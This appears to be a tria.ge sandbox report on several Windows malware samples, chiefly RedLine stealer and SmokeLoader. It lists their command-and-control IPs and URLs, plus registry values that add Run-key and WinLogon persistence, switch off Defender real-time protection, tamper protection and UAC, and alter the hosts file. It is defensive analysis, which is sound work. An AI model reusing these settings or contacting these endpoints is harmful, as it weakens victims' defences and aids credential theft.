Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
022e3c30a1...66.exe
windows11_x64
10022e3c30a1...66.exe
windows10_x64
1022e3c30a1...66.exe
windows10_x64
104d27dca0a1...ef.exe
windows11_x64
104d27dca0a1...ef.exe
windows10_x64
104d27dca0a1...ef.exe
windows10_x64
10578a3a7a2b...b3.exe
windows11_x64
10578a3a7a2b...b3.exe
windows10_x64
10578a3a7a2b...b3.exe
windows10_x64
109c4880a98c...82.exe
windows11_x64
109c4880a98c...82.exe
windows10_x64
109c4880a98c...82.exe
windows10_x64
10a1dad4a83d...c4.exe
windows11_x64
10a1dad4a83d...c4.exe
windows10_x64
10a1dad4a83d...c4.exe
windows10_x64
10acf1b7d80f...e0.exe
windows11_x64
10acf1b7d80f...e0.exe
windows10_x64
10acf1b7d80f...e0.exe
windows10_x64
10cbf31d825a...d2.exe
windows11_x64
10cbf31d825a...d2.exe
windows10_x64
10cbf31d825a...d2.exe
windows10_x64
10db76a117db...12.exe
windows11_x64
10db76a117db...12.exe
windows10_x64
10db76a117db...12.exe
windows10_x64
10e2ffb8aeeb...f6.exe
windows11_x64
10e2ffb8aeeb...f6.exe
windows10_x64
10e2ffb8aeeb...f6.exe
windows10_x64
10f2196668f4...cb.exe
windows11_x64
10f2196668f4...cb.exe
windows10_x64
10f2196668f4...cb.exe
windows10_x64
10Resubmissions
10/11/2021, 14:50
211110-r7nbvaeddr 1008/11/2021, 16:12
211108-tnmmbahgaj 1008/11/2021, 15:26
211108-svdsbaccf6 1008/11/2021, 14:48
211108-r6lfvshdfn 10Analysis
-
max time kernel
704s -
max time network
1247s -
platform
windows11_x64 -
resource
win11 -
submitted
08/11/2021, 16:12
Static task
static1
Behavioral task
behavioral1
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win11
Behavioral task
behavioral2
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-en-20211014
Behavioral task
behavioral3
Sample
022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Resource
win10-de-20211014
Behavioral task
behavioral4
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win11
Behavioral task
behavioral5
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win10-en-20211014
Behavioral task
behavioral6
Sample
4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe
Resource
win10-de-20211014
Behavioral task
behavioral7
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win11
Behavioral task
behavioral8
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win10-en-20211014
Behavioral task
behavioral9
Sample
578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
Resource
win10-de-20211014
Behavioral task
behavioral10
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win11
Behavioral task
behavioral11
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10-en-20211104
Behavioral task
behavioral12
Sample
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Resource
win10-de-20211014
Behavioral task
behavioral13
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win11
Behavioral task
behavioral14
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10-en-20211014
Behavioral task
behavioral15
Sample
a1dad4a83d843acffbf293c0979951255abd9be4524d5a46c2fd48942a8a47c4.exe
Resource
win10-de-20211104
Behavioral task
behavioral16
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win11
Behavioral task
behavioral17
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win10-en-20211014
Behavioral task
behavioral18
Sample
acf1b7d80fc61269691cc9c7cb4884ffd5bbf5b1538c336c1007127d157738e0.exe
Resource
win10-de-20211104
Behavioral task
behavioral19
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win11
Behavioral task
behavioral20
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win10-en-20211104
Behavioral task
behavioral21
Sample
cbf31d825ac364f97420cb6523bca7bbcab24292e93fc9e946e64cb446291ad2.exe
Resource
win10-de-20211104
Behavioral task
behavioral22
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win11
Behavioral task
behavioral23
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win10-en-20211104
Behavioral task
behavioral24
Sample
db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Resource
win10-de-20211104
Behavioral task
behavioral25
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win11
Behavioral task
behavioral26
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win10-en-20211104
Behavioral task
behavioral27
Sample
e2ffb8aeeb869fbb3de97b95b0c5c9cf2234d85612ba111115a938c89e4d94f6.exe
Resource
win10-de-20211104
Behavioral task
behavioral28
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win11
Behavioral task
behavioral29
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win10-en-20211104
Behavioral task
behavioral30
Sample
f2196668f412d730bc6bd24f08b749ed411d3450f9b4af846fc759e249f72acb.exe
Resource
win10-de-20211104
General
-
Target
9c4880a98c53084391a2e2ec350515da63c1dc8ac929af17f012b690b0453782.exe
Malware Config
Extracted
redline
fucker2
135.181.129.119:4805
Extracted
redline
Chris
194.104.136.5:46013
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://nalirou70.top/
http://xacokuo80.top/
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Local\\chromedrlver.exe," jsc.exe -
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6112 4792 rundll32.exe 22 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6580 4792 rundll32.exe 22 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8600 4792 rundll32.exe 22 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7664 4792 rundll32.exe 22 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral10/memory/5504-310-0x0000000000000000-mapping.dmp family_redline behavioral10/memory/5504-311-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral10/memory/5512-314-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral10/memory/5512-313-0x0000000000000000-mapping.dmp family_redline behavioral10/memory/5532-327-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 42 IoCs
description pid Process procid_target PID 2592 created 3764 2592 WerFault.exe 111 PID 4048 created 2116 4048 WerFault.exe 83 PID 5144 created 1116 5144 WerFault.exe 123 PID 5312 created 3228 5312 WerFault.exe 142 PID 4880 created 408 4880 WerFault.exe 151 PID 1304 created 2960 1304 WerFault.exe 149 PID 6828 created 5824 6828 Process not Found 260 PID 7000 created 5932 7000 WerFault.exe 379 PID 6748 created 5816 6748 sc.exe 220 PID 3472 created 5984 3472 powershell.exe 310 PID 5844 created 2432 5844 RunDll32.exe 216 PID 5848 created 6820 5848 WerFault.exe 240 PID 6020 created 1596 6020 WerFault.exe 239 PID 5568 created 6852 5568 WerFault.exe 236 PID 3472 created 6788 3472 powershell.exe 503 PID 5164 created 3036 5164 Conhost.exe 507 PID 5760 created 2536 5760 WerFault.exe 215 PID 2000 created 6892 2000 WerFault.exe 250 PID 3496 created 6608 3496 WerFault.exe 228 PID 7360 created 2200 7360 WerFault.exe 391 PID 496 created 6176 496 WerFault.exe 690 PID 1616 created 5984 1616 WerFault.exe 310 PID 3812 created 5952 3812 WerFault.exe 378 PID 3812 created 7384 3812 WerFault.exe 326 PID 5664 created 7496 5664 WerFault.exe 328 PID 5488 created 1064 5488 WerFault.exe 355 PID 6848 created 8924 6848 WerFault.exe 410 PID 736 created 5608 736 WerFault.exe 421 PID 3628 created 9128 3628 WerFault.exe 418 PID 4432 created 3404 4432 WerFault.exe 436 PID 1464 created 8036 1464 WerFault.exe 455 PID 8396 created 6420 8396 Process not Found 531 PID 6744 created 400 6744 WerFault.exe 498 PID 3036 created 2440 3036 WerFault.exe 502 PID 1616 created 2312 1616 WerFault.exe 508 PID 6904 created 9072 6904 WerFault.exe 515 PID 5464 created 8884 5464 WerFault.exe 523 PID 8688 created 8516 8688 WerFault.exe 604 PID 7684 created 8516 7684 WerFault.exe 604 PID 6860 created 8540 6860 WerFault.exe 628 PID 3300 created 2156 3300 WerFault.exe 656 PID 7676 created 6460 7676 WerFault.exe 642 -
Suspicious use of NtCreateUserProcessOtherParentProcess 20 IoCs
description pid Process procid_target PID 5732 created 5660 5732 svchost.exe 181 PID 5732 created 5660 5732 svchost.exe 181 PID 5732 created 5676 5732 svchost.exe 174 PID 5732 created 5676 5732 svchost.exe 174 PID 5732 created 5560 5732 svchost.exe 272 PID 5732 created 5560 5732 svchost.exe 272 PID 5732 created 5744 5732 svchost.exe 273 PID 5732 created 5744 5732 svchost.exe 273 PID 5732 created 256 5732 svchost.exe 306 PID 5732 created 256 5732 svchost.exe 306 PID 5732 created 6896 5732 svchost.exe 562 PID 5732 created 6896 5732 svchost.exe 562 PID 5732 created 4664 5732 svchost.exe 547 PID 5732 created 4664 5732 svchost.exe 547 PID 5732 created 2144 5732 svchost.exe 548 PID 5732 created 2144 5732 svchost.exe 548 PID 5732 created 8692 5732 svchost.exe 587 PID 5732 created 8692 5732 svchost.exe 587 PID 5732 created 8112 5732 svchost.exe 588 PID 5732 created 8112 5732 svchost.exe 588 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
resource yara_rule behavioral10/files/0x000200000001efb1-164.dat aspack_v212_v242 behavioral10/files/0x000200000001efb1-163.dat aspack_v212_v242 behavioral10/files/0x000200000001ef15-159.dat aspack_v212_v242 behavioral10/files/0x000200000001ef15-160.dat aspack_v212_v242 behavioral10/files/0x000200000001ef17-158.dat aspack_v212_v242 behavioral10/files/0x000200000001ef17-157.dat aspack_v212_v242 -
Blocklisted process makes network request 8 IoCs
flow pid Process 104 5932 schtasks.exe 131 5932 schtasks.exe 134 5932 schtasks.exe 138 5932 schtasks.exe 140 5932 schtasks.exe 144 5932 schtasks.exe 145 5932 schtasks.exe 489 9068 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
pid Process 2972 setup_installer.exe 2116 setup_install.exe 3436 Wed128c2773227671b3f.exe 3292 Wed12fb2a5c52f05816.exe 3764 Wed126ca6605dbec0399.exe 3832 Wed120b6f5c6d562.exe 440 Wed1217e6a0ef74ed.exe 1692 Wed12bcd18bdbc441.exe 1488 Wed120b6f5c6d562.tmp 2280 Wed1229427acd4bc167.exe 4616 Wed121f7e9e92793cf.exe 2996 Wed12859e3c1cf63b6a0.exe 1116 Wed12fbb08f1dfc28.exe 1812 Wed129eb9b8859.exe 2348 Wed12ebaf7883e1890d.exe 4248 Wed120b6f5c6d562.exe 4584 Wed1241cc206cfb.exe 5204 Wed120b6f5c6d562.tmp 5504 Wed128c2773227671b3f.exe 5512 Wed121f7e9e92793cf.exe 5692 kbTxHZeYOomBllay3dpYIR9f.exe 5532 Wed12859e3c1cf63b6a0.exe 5752 kbTxHZeYOomBllay3dpYIR9f.exe 5964 VAKlCUnlQu.exe 6036 6736747.exe 5228 227470.exe 5628 Conhost.exe 5956 hgFUPQSfVWja4bF9va2Nco94.exe 408 PsHhTfowuIHRylZl4gkpCI9u.exe 2960 CUdVFaUwSqvIYDEDWI1VHn3_.exe 6004 JoVBqle5ZuYZOmKRj95tPfGf.exe 5932 schtasks.exe 6128 3601344.exe 1460 Conhost.exe 1548 powershell.exe 5644 503782.exe 5824 WerFault.exe 5348 Conhost.exe 3248 SS9XSoZmzR6yTxeWosrHLE5V.exe 5592 JoVBqle5ZuYZOmKRj95tPfGf.exe 5676 AdvancedRun.exe 5660 AdvancedRun.exe 1080 8pWB.eXE 6204 WinHoster.exe 2148 _WjLopI0SGjVoK1vv4RABWvT.exe 6912 RxAPuFNW.exe 6456 _WjLopI0SGjVoK1vv4RABWvT.exe 2432 LtPGrXM6HcaPC22YEKYV8Nfi.exe 2536 XjhsglKxkrcTUd6de5gbWXb0.exe 5156 CccUqSnvorEDEpUpxK4J3YF5.exe 6820 HZF5DVkBv1ZqBbYSSg8j3oEv.exe 5420 ArGiap3960SUZs1dAEDT_gNj.exe 5816 D889cNcc5Y_B8MT1CZoqotRj.exe 4264 IjhdP4nV_bnmATIamZ0oM7vu.exe 6156 D_BLDnDHu_TD3iz9CSGyBFPI.exe 1088 hgFUPQSfVWja4bF9va2Nco94.exe 1596 ImBQvx_Kr5O0lBuAItFuMM0V.exe 5984 setup_2.exe 3824 Q_fET_usQo2X_6EmGsXsx62w.exe 6852 Bd4X2NxFXA5NEmJKfUAVox3h.exe 6832 xf7rCbRH4pGRa62Ofza35vUU.exe 1288 7elpvTmw1vT1ONC9ndp6H4va.exe 3036 WerFault.exe 4376 T95LOChSK2FJnZ8sP6x6_E2w.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MegogoSell_crypted.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RfdHYMkUrnVfH1ZtERmjgC7e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 227470.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CccUqSnvorEDEpUpxK4J3YF5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CccUqSnvorEDEpUpxK4J3YF5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8588289.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MegogoSell_crypted.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Q_fET_usQo2X_6EmGsXsx62w.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Q_fET_usQo2X_6EmGsXsx62w.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 227470.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RfdHYMkUrnVfH1ZtERmjgC7e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8588289.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe hgFUPQSfVWja4bF9va2Nco94.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe hgFUPQSfVWja4bF9va2Nco94.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe 877E.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe 877E.exe -
Loads dropped DLL 64 IoCs
pid Process 2116 setup_install.exe 2116 setup_install.exe 2116 setup_install.exe 2116 setup_install.exe 2116 setup_install.exe 1488 Wed120b6f5c6d562.tmp 5204 Wed120b6f5c6d562.tmp 3228 rundll32.exe 3248 SS9XSoZmzR6yTxeWosrHLE5V.exe 3248 SS9XSoZmzR6yTxeWosrHLE5V.exe 3248 SS9XSoZmzR6yTxeWosrHLE5V.exe 6760 msiexec.exe 3248 SS9XSoZmzR6yTxeWosrHLE5V.exe 3248 SS9XSoZmzR6yTxeWosrHLE5V.exe 5492 setup.exe 5492 setup.exe 720 rundll32.exe 720 rundll32.exe 6060 Conhost.exe 6972 Conhost.exe 6972 Conhost.exe 7872 setup.tmp 6972 Conhost.exe 6972 Conhost.exe 6972 Conhost.exe 5952 rundll32.exe 6972 Conhost.exe 6972 Conhost.exe 2644 setup.exe 2644 setup.exe 9208 H5g745DD4zaGI4veDHXuzIg9.exe 9208 H5g745DD4zaGI4veDHXuzIg9.exe 8760 msiexec.exe 8760 msiexec.exe 2948 Setup.exe 2948 Setup.exe 2756 Pr94tBJFmmmBtB5jfTVqm8MB.tmp 9208 H5g745DD4zaGI4veDHXuzIg9.exe 9208 H5g745DD4zaGI4veDHXuzIg9.exe 2964 dtIpIQ_qtf_Fq6mF3YqSxzxN.exe 2964 dtIpIQ_qtf_Fq6mF3YqSxzxN.exe 9208 H5g745DD4zaGI4veDHXuzIg9.exe 9208 H5g745DD4zaGI4veDHXuzIg9.exe 7940 TyORHIs1LZXKQSe6l2yLpqNb.tmp 2964 dtIpIQ_qtf_Fq6mF3YqSxzxN.exe 2964 dtIpIQ_qtf_Fq6mF3YqSxzxN.exe 7108 rundll32.exe 7108 rundll32.exe 2964 dtIpIQ_qtf_Fq6mF3YqSxzxN.exe 2964 dtIpIQ_qtf_Fq6mF3YqSxzxN.exe 5360 setup.exe 5360 setup.exe 400 rundll32.exe 5384 setup.exe 5384 setup.exe 5076 rundll32.exe 5076 rundll32.exe 8884 rundll32.exe 2664 rundll32.exe 2664 rundll32.exe 2644 setup.exe 2644 setup.exe 2644 setup.exe 2644 setup.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet hgFUPQSfVWja4bF9va2Nco94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\877E.exe = "0" 877E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Cursors\veejays\svchost.exe = "0" 877E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\Adobe Films\hgFUPQSfVWja4bF9va2Nco94.exe = "0" hgFUPQSfVWja4bF9va2Nco94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" hgFUPQSfVWja4bF9va2Nco94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe = "0" hgFUPQSfVWja4bF9va2Nco94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe = "0" 877E.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths hgFUPQSfVWja4bF9va2Nco94.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features hgFUPQSfVWja4bF9va2Nco94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\sememe\svchost.exe = "0" hgFUPQSfVWja4bF9va2Nco94.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions hgFUPQSfVWja4bF9va2Nco94.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection hgFUPQSfVWja4bF9va2Nco94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" hgFUPQSfVWja4bF9va2Nco94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" hgFUPQSfVWja4bF9va2Nco94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" hgFUPQSfVWja4bF9va2Nco94.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 15 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" Conhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\hepatocyte = "C:\\Program Files\\Common Files\\System\\sememe\\svchost.exe" hgFUPQSfVWja4bF9va2Nco94.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\hepatocyte = "C:\\Program Files\\Common Files\\System\\sememe\\svchost.exe" hgFUPQSfVWja4bF9va2Nco94.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\scriptwriters = "C:\\Windows\\Cursors\\veejays\\svchost.exe" 877E.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\scriptwriters = "C:\\Windows\\Cursors\\veejays\\svchost.exe" scriptwriters.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Mail\\Bududosopo.exe\"" DYbALA.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\hepatocyte = "C:\\Program Files\\Common Files\\System\\sememe\\svchost.exe" hepatocyte.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --bo6y9QQgnM" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --bo6y9QQgnM" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --bo6y9QQgnM" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --bo6y9QQgnM" setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Q_fET_usQo2X_6EmGsXsx62w.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RfdHYMkUrnVfH1ZtERmjgC7e.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CccUqSnvorEDEpUpxK4J3YF5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hepatocyte.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 877E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" scriptwriters.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 227470.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MegogoSell_crypted.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" hgFUPQSfVWja4bF9va2Nco94.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8588289.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 877E.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hgFUPQSfVWja4bF9va2Nco94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" hgFUPQSfVWja4bF9va2Nco94.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hgFUPQSfVWja4bF9va2Nco94.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" hepatocyte.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA scriptwriters.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
